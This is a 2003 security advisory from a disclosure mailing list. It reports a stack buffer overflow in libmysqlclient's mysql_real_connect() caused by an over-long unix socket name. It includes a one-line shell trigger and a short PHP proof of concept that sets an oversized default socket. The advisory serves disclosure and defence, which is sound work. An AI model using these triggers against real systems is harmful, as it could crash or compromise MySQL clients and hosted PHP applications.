[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3EE88DA9.1020006@scan-associates.net>
Date: Thu, 12 Jun 2003 22:26:49 +0800
From: pokleyzz <pokleyzz@...n-associates.net>
To: bugtraq@...urityfocus.com, wulnwatch@...nwatch.net,
full-disclosure@...ts.netsys.com, tech@...n-associates.net
Subject: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
SCAN Associates Sdn Bhd Security Advisory
Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
Description
===========
libmysqlclient is client library to communicate with mysql server.
Details
=======
There is stack buffer overflow in mysql_real_connect() function with
long unix socket name (over 300 character).
ex:
mysql -S `perl -e 'print "A" x 350'` -hlocalhost
proof of concept
----------------
This bug have succesfully test on safe_mode php in our latest geeklog bug
http://www.scan-associates.net/papers/geeklog.txt where user can upload
*.php file.
<?php
for ($i;$i<350;$i++)
$buff .= "A";
ini_set("mysql.default_socket","$buff");
mysql_connect("localhost", "blabla", "blabla");
?>
Vendor Response
===============
Vendor has been contacted on 06/01/2003 and fix will available soon.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists